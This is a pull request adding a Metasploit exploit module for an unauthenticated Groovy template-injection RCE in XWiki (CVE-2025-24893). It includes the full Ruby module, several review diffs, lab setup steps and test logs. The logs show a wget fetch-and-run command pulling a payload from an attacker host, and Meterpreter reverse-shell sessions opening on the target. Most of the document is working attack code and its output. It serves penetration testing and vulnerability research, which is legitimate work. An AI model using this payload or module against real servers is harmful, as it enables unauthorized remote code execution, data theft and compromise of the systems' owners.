### PR TITLE
Add XWiki Unauthenticated RCE (CVE-2025-24893)

### DIFF
--- a/documentation/modules/exploit/multi/http/xwiki_unauth_rce_cve_2025_24893.md
+++ b/documentation/modules/exploit/multi/http/xwiki_unauth_rce_cve_2025_24893.md
@@ -1,0 +1,119 @@
+## Vulnerable Application
+
+This module exploits a template injection vulnerability in the the XWiki Platform.
+XWiki includes a macro called SolrSearch (defined in Main.SolrSearchMacros) that enables full-text search through the embedded Solr engine. 
+The vulnerability stems from the way this macro evaluates search parameters in Groovy, failing to sanitize or restrict malicious input.
+
+This vulnerability affects XWiki Platform versions >= 5.3‑milestone‑2 and < 15.10.11, and versions >= 16.0.0‑rc‑1 and < 16.4.1.
+Successful exploitation may result in remote code execution under the privileges of the web server, potentially exposing sensitive data or disrupting survey operations.
+
+An attacker can execute arbitrary system commands in the context of the user running the web server.
+
+## Testing
+
+### Setup a Linux Server to Host the XWiki
+
+To set up a test environment:
+
+1. Download and Install Ubuntu 18.04.6 LTS
+
+Download the ISO from the official Ubuntu archive:
+https://releases.ubuntu.com/18.04/
+
+2. Install OpenJDK 17
+
+```
+wget https://github.com/adoptium/temurin17-binaries/releases/download/jdk-17.0.9%2B9/OpenJDK17U-jdk_x64_linux_hotspot_17.0.9_9.tar.gz
+sudo mkdir -p /opt/java
+sudo tar -xzf OpenJDK17U-jdk_x64_linux_hotspot_17.0.9_9.tar.gz -C /opt/java
+export JAVA_HOME=/opt/java/jdk-17.0.9+9
+export PATH=$JAVA_HOME/bin:$PATH
+```
+
+3. Download and Unpack Vulnerable XWiki
+
+```
+wget https://nexus.xwiki.org/nexus/content/groups/public/org/xwiki/platform/xwiki-platform-distribution-flavor-jetty-hsqldb/15.10.5/xwiki-platform-distribution-flavor-jetty-hsqldb-15.10.5.zip
+```
+
+```
+unzip https://nexus.xwiki.org/nexus/content/groups/public/org/xwiki/platform/xwiki-platform-distribution-flavor-jetty-hsqldb/15.10.5/xwiki-platform-distribution-flavor-jetty-hsqldb-15.10.5.zip
+```
+
+4. Run XWiki
+
+Go to the directory where you've unpack archive and run `start_xwiki.sh`
+
+### Setup a Windows Server to Host XWiki
+
+1. Download and Install Windows
+
+Download Windows 10 ISO from the official Microsoft site:
+https://www.microsoft.com/en-us/software-download/windows10
+
+Follow standard installation steps in your hypervisor (e.g., VirtualBox, VMware, etc.).
+
+2. Install OpenJDK 17
+
+Download `.msi` file from this page
+
+```
+https://learn.microsoft.com/en-us/java/openjdk/download#openjdk-17
+```
+
+and install
+
+3. Download and Unpack Vulnerable XWiki
+
+```
+https://nexus.xwiki.org/nexus/content/groups/public/org/xwiki/platform/xwiki-platform-distribution-flavor-jetty-hsqldb/15.10.5/xwiki-platform-distribution-flavor-jetty-hsqldb-15.10.5.zip
+```
+
+Open with 7-zip or another archiver and unpack
+
+4. Run XWiki
+
+Go to the directory where you've unpack archive and run `start_xwiki.bat`
+
+## Scenario
+
+```
+msf6 > use multi/http/xwiki_unauth_rce_cve_2025_24893
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/xwiki_unauth_rce_cve_2025_24893) > set RHOSTS 192.168.19.136
+RHOSTS => 192.168.19.136
+msf6 exploit(multi/http/xwiki_unauth_rce_cve_2025_24893) > set RPORT 8080
+RPORT => 8080
+msf6 exploit(multi/http/xwiki_unauth_rce_cve_2025_24893) > run verbose=true
+
+[*] Command to run on remote host: wget -qO ./oXsSiyiPG http://192.168.19.130:8080/TZr1rd35vcaOY2R1ivAgxA; chmod +x ./oXsSiyiPG; ./oXsSiyiPG &
+[*] Fetch handler listening on 192.168.19.130:8080
+[*] HTTP server started
+[*] Adding resource /TZr1rd35vcaOY2R1ivAgxA
+[*] Started reverse TCP handler on 192.168.19.130:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Extracting version...
+[*] Extracted version: 15.10.5
+[+] The target appears to be vulnerable.
+[*] Building command for target...
+[*] Uploading malicious payload...
+[*] Client 192.168.19.136 requested /TZr1rd35vcaOY2R1ivAgxA
+[*] Sending payload to 192.168.19.136 (Wget/1.19.4 (linux-gnu))
+[*] Client 192.168.19.136 requested /TZr1rd35vcaOY2R1ivAgxA
+[*] Sending payload to 192.168.19.136 (Wget/1.19.4 (linux-gnu))
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.19.136
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.19.136
+[-] Failed to load client portion of stdapi.
+[*] Meterpreter session 2 opened (192.168.19.130:4444 -> 192.168.19.136:36512) at 2025-08-23 23:42:12 -0400
+
+[*] Meterpreter session 1 opened (192.168.19.130:4444 -> 192.168.19.136:36510) at 2025-08-23 23:42:12 -0400
+meterpreter > sysinfo
+Computer     : 192.168.19.136
+OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```

--- a/documentation/modules/exploit/multi/http/xwiki_unauth_rce_cve_2025_24893.md
+++ b/documentation/modules/exploit/multi/http/xwiki_unauth_rce_cve_2025_24893.md
@@ -37,7 +37,7 @@ wget https://nexus.xwiki.org/nexus/content/groups/public/org/xwiki/platform/xwik
 ```
 
 ```
-unzip https://nexus.xwiki.org/nexus/content/groups/public/org/xwiki/platform/xwiki-platform-distribution-flavor-jetty-hsqldb/15.10.5/xwiki-platform-distribution-flavor-jetty-hsqldb-15.10.5.zip
+unzip xwiki-platform-distribution-flavor-jetty-hsqldb-15.10.5.zip
 ```
 
 4. Run XWiki

--- a/documentation/modules/exploit/multi/http/xwiki_unauth_rce_cve_2025_24893.md
+++ b/documentation/modules/exploit/multi/http/xwiki_unauth_rce_cve_2025_24893.md
@@ -5,7 +5,7 @@ XWiki includes a macro called SolrSearch (defined in Main.SolrSearchMacros) that
 The vulnerability stems from the way this macro evaluates search parameters in Groovy, failing to sanitize or restrict malicious input.
 
 This vulnerability affects XWiki Platform versions >= 5.3‑milestone‑2 and < 15.10.11, and versions >= 16.0.0‑rc‑1 and < 16.4.1.
-Successful exploitation may result in remote code execution under the privileges of the web server, potentially exposing sensitive data or disrupting survey operations.
+Successful exploitation may result in the remote code execution under the privileges of the web server, potentially exposing sensitive data or disrupting survey operations.
 
 An attacker can execute arbitrary system commands in the context of the user running the web server.
 

--- a/modules/exploits/multi/http/xwiki_unauth_rce_cve_2025_24893.rb
+++ b/modules/exploits/multi/http/xwiki_unauth_rce_cve_2025_24893.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
           The vulnerability stems from the way this macro evaluates search parameters in Groovy, failing to sanitize or restrict malicious input.
 
           This vulnerability affects XWiki Platform versions >= 5.3-milestone-2 and < 15.10.11, and versions >= 16.0.0-rc-1 and < 16.4.1.
-          Successful exploitation may result in remote code execution under the privileges
+          Successful exploitation may result in the remote code execution under the privileges
           of the web server, potentially exposing sensitive data or disrupting survey operations.
 
           An attacker can execute arbitrary system commands in the context of the user running the web server.
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2025-24893'],
           ['URL', 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j']
         ],
-        'Platform' => ['multi'],
+        'Platform' => ['unix', 'linux', 'win'],
         'Arch' => [ARCH_CMD],
         'Targets' => [
           [
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Windows Command',
             {
-              'Platform' => ['windows'],
+              'Platform' => ['win'],
               'Arch' => ARCH_CMD,
               'Type' => :win_cmd
               # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp
@@ -90,46 +90,60 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     return CheckCode::Unknown('No response from target') unless res&.code == 200
 
-    if res.body =~ %r{<div id="xwikiplatformversion">.*?XWiki.*?(\d+\.\d+\.\d+).*?</div>}m
-      version_match = Regexp.last_match(1).to_s
-      version = Rex::Version.new(version_match)
-      print_status("Extracted version: #{version}")
-
-      if version.between?(Rex::Version.new('5.3.0'), Rex::Version.new('15.10.11')) ||
-         version.between?(Rex::Version.new('16.0.0'), Rex::Version.new('16.4.0'))
-        return CheckCode::Appears
-      end
-    else
-      print_error("#{peer} - Unable to extract version number")
+    version_div = res.get_html_document.at('div[id="xwikiplatformversion"]')
+    unless version_div
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to find <div id=\"xwikiplatformversion\"> tag in response")
+      return CheckCode::Safe('Possibly not XWiki or incorrect path (version tag not found)')
     end
 
-    CheckCode::Safe
+    version_match = version_div.text.match(/XWiki.*?(\d+\.\d+\.\d+)/)
+    unless version_match
+      print_error("#{peer} - Unable to extract version number")
+      return CheckCode::Detected('XWiki detected, but version number missing or unrecognized')
+    end
+
+    version = Rex::Version.new(Regexp.last_match(1).to_s)
+    print_status("Extracted version: #{version}")
+
+    if version.between?(Rex::Version.new('5.3.0'), Rex::Version.new('15.10.10')) ||
+       version.between?(Rex::Version.new('16.0.0'), Rex::Version.new('16.4.0'))
+      return CheckCode::Appears("Detected version #{version}, which is vulnerable")
+    end
+
+    return CheckCode::Safe("Version #{version} appears safe")
   end
 
   def build_cmd
+    print_status('Building command for target...')
+
     if target['Type'] == :unix_cmd
       cmd_array = "'sh', '-c', '#{payload.encoded}'"
     else
-      cmd_array = "'cmd.exe', '/B', '/q', '/c', '#{payload.encoded}'"
+      cmd_array = "'cmd.exe', '/b', '/q', '/c', '#{payload.encoded}'"
     end
 
-    Rex::Text.uri_encode("}}}{{async async=false}}{{groovy}}[#{cmd_array}].execute(){{/groovy}}{{/async}}")
+    print_good('Command successfully built for target')
+
+    return "}}}{{async async=false}}{{groovy}}[#{cmd_array}].execute(){{/groovy}}{{/async}}"
   end
 
-  def exploit
-    print_status('Building command for target...')
-    cmd = build_cmd
+  def send_payload(cmd)
+    print_status('Uploading payload...')
 
-    print_status('Uploading malicious payload...')
-    query_string = [
-      'media=rss',
-      "text=#{cmd}",
-    ].join('&')
+    vars_get = {
+      'media' => 'rss',
+      'text' => cmd
+    }
 
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, '/xwiki/bin/get/Main/SolrSearch'),
       'method' => 'GET',
-      'query' => query_string
+      'vars_get' => vars_get
     })
+  end
+
+  def exploit
+    cmd = build_cmd
+    send_payload(cmd)
   end
 end

--- a/modules/exploits/multi/http/xwiki_unauth_rce_cve_2025_24893.rb
+++ b/modules/exploits/multi/http/xwiki_unauth_rce_cve_2025_24893.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote
           XWiki includes a macro called SolrSearch (defined in Main.SolrSearchMacros) that enables full-text search through the embedded Solr engine.
           The vulnerability stems from the way this macro evaluates search parameters in Groovy, failing to sanitize or restrict malicious input.
 
-          This vulnerability affects XWiki Platform versions >= 5.3‑milestone‑2 and < 15.10.11, and versions >= 16.0.0‑rc‑1 and < 16.4.1.
+          This vulnerability affects XWiki Platform versions >= 5.3-milestone-2 and < 15.10.11, and versions >= 16.0.0-rc-1 and < 16.4.1.
           Successful exploitation may result in remote code execution under the privileges
           of the web server, potentially exposing sensitive data or disrupting survey operations.
 

--- a/modules/exploits/multi/http/xwiki_unauth_rce_cve_2025_24893.rb
+++ b/modules/exploits/multi/http/xwiki_unauth_rce_cve_2025_24893.rb
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown('No response from target') unless res&.code == 200
 
     version_div = res.get_html_document.at('div[id="xwikiplatformversion"]')
-      return CheckCode::Safe('Possibly not XWiki or incorrect path (version tag not found)') unless version_div
+    return CheckCode::Safe('Possibly not XWiki or incorrect path (version tag not found)') unless version_div
 
     version_match = version_div.text.match(/XWiki.*?(\d+\.\d+\.\d+)/)
     unless version_match

--- a/modules/exploits/multi/http/xwiki_unauth_rce_cve_2025_24893.rb
+++ b/modules/exploits/multi/http/xwiki_unauth_rce_cve_2025_24893.rb
@@ -91,10 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown('No response from target') unless res&.code == 200
 
     version_div = res.get_html_document.at('div[id="xwikiplatformversion"]')
-    unless version_div
-      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to find <div id=\"xwikiplatformversion\"> tag in response")
-      return CheckCode::Safe('Possibly not XWiki or incorrect path (version tag not found)')
-    end
+      return CheckCode::Safe('Possibly not XWiki or incorrect path (version tag not found)') unless version_div
 
     version_match = version_div.text.match(/XWiki.*?(\d+\.\d+\.\d+)/)
     unless version_match

--- a/modules/exploits/multi/http/xwiki_unauth_rce_cve_2025_24893.rb
+++ b/modules/exploits/multi/http/xwiki_unauth_rce_cve_2025_24893.rb
@@ -124,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_good('Command successfully built for target')
 
-    return "}}}{{async async=false}}{{groovy}}[#{cmd_array}].execute(){{/groovy}}{{/async}}"
+    return "{{async async=false}}{{groovy}}[#{cmd_array}].execute().text{{/groovy}}{{/async}}"
   end
 
   def send_payload(cmd)

--- a/modules/exploits/multi/http/xwiki_unauth_rce_cve_2025_24893.rb
+++ b/modules/exploits/multi/http/xwiki_unauth_rce_cve_2025_24893.rb
@@ -1,0 +1,135 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)',
+        'Description' => %q{
+          This module exploits a template injection vulnerability in the the XWiki Platform.
+          XWiki includes a macro called SolrSearch (defined in Main.SolrSearchMacros) that enables full-text search through the embedded Solr engine.
+          The vulnerability stems from the way this macro evaluates search parameters in Groovy, failing to sanitize or restrict malicious input.
+
+          This vulnerability affects XWiki Platform versions >= 5.3‑milestone‑2 and < 15.10.11, and versions >= 16.0.0‑rc‑1 and < 16.4.1.
+          Successful exploitation may result in remote code execution under the privileges
+          of the web server, potentially exposing sensitive data or disrupting survey operations.
+
+          An attacker can execute arbitrary system commands in the context of the user running the web server.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Maksim Rogov', # Metasploit Module
+          'John Kwak' # Vulnerability Discovery
+        ],
+        'References' => [
+          ['CVE', '2025-24893'],
+          ['URL', 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j']
+        ],
+        'Platform' => ['multi'],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                # On Debian 9 curl is not installed by default
+                'FETCH_COMMAND' => 'WGET'
+              }
+              # Tested with cmd/unix/reverse_bash
+              # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => ['windows'],
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd
+              # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+        ],
+        'Payload' => {
+          'BadChars' => '\\'
+        },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2025-02-20',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Path to XWiki', '/']),
+      ]
+    )
+  end
+
+  def check
+    print_status('Extracting version...')
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/xwiki/bin/view/Main/'),
+      'method' => 'GET'
+    )
+    return CheckCode::Unknown('No response from target') unless res&.code == 200
+
+    if res.body =~ %r{<div id="xwikiplatformversion">.*?XWiki.*?(\d+\.\d+\.\d+).*?</div>}m
+      version_match = Regexp.last_match(1).to_s
+      version = Rex::Version.new(version_match)
+      print_status("Extracted version: #{version}")
+
+      if version.between?(Rex::Version.new('5.3.0'), Rex::Version.new('15.10.11')) ||
+         version.between?(Rex::Version.new('16.0.0'), Rex::Version.new('16.4.0'))
+        return CheckCode::Appears
+      end
+    else
+      print_error("#{peer} - Unable to extract version number")
+    end
+
+    CheckCode::Safe
+  end
+
+  def build_cmd
+    if target['Type'] == :unix_cmd
+      cmd_array = "'sh', '-c', '#{payload.encoded}'"
+    else
+      cmd_array = "'cmd.exe', '/B', '/q', '/c', '#{payload.encoded}'"
+    end
+
+    Rex::Text.uri_encode("}}}{{async async=false}}{{groovy}}[#{cmd_array}].execute(){{/groovy}}{{/async}}")
+  end
+
+  def exploit
+    print_status('Building command for target...')
+    cmd = build_cmd
+
+    print_status('Uploading malicious payload...')
+    query_string = [
+      'media=rss',
+      "text=#{cmd}",
+    ].join('&')
+
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/xwiki/bin/get/Main/SolrSearch'),
+      'method' => 'GET',
+      'query' => query_string
+    })
+  end
+end


### PR DESCRIPTION
# Vulnerability Details

This module exploits a template injection vulnerability in the the XWiki Platform.
XWiki includes a macro called SolrSearch (defined in Main.SolrSearchMacros) that enables full-text search through the embedded Solr engine. The vulnerability stems from the way this macro evaluates search parameters in Groovy, failing to sanitize or restrict malicious input.

This vulnerability affects XWiki Platform versions >= 5.3‑milestone‑2 and < 15.10.11, and versions >= 16.0.0‑rc‑1 and < 16.4.1.
Successful exploitation may result in remote code execution under the privileges of the web server, potentially exposing sensitive data or disrupting survey operations.

An attacker can execute arbitrary system commands in the context of the user running the web server.

# Module Information

Module path: `exploit/multi/http/xwiki_unauth_rce_cve_2025_24893`
Platform: `Linux/Unix/Windows`
Tested on: `Ubuntu 18.0.4 / Windows 10`
Requirements: `Nothing`

# References

- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j

# Test Output
```
msf6 > use multi/http/xwiki_unauth_rce_cve_2025_24893
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/xwiki_unauth_rce_cve_2025_24893) > set RHOSTS 192.168.19.136
RHOSTS => 192.168.19.136
msf6 exploit(multi/http/xwiki_unauth_rce_cve_2025_24893) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/xwiki_unauth_rce_cve_2025_24893) > run

[*] Started reverse TCP handler on 192.168.19.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Extracting version...
[*] Extracted version: 15.10.5
[+] The target appears to be vulnerable.
[*] Building command for target...
[*] Uploading malicious payload...
[*] Sending stage (3045380 bytes) to 192.168.19.136
[*] Sending stage (3045380 bytes) to 192.168.19.136
[*] Meterpreter session 1 opened (192.168.19.130:4444 -> 192.168.19.136:55606) at 2025-08-23 10:41:34 -0400

[*] Meterpreter session 2 opened (192.168.19.130:4444 -> 192.168.19.136:55622) at 2025-08-23 10:41:34 -0400
meterpreter > sysinfo
Computer     : 192.168.19.136
OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```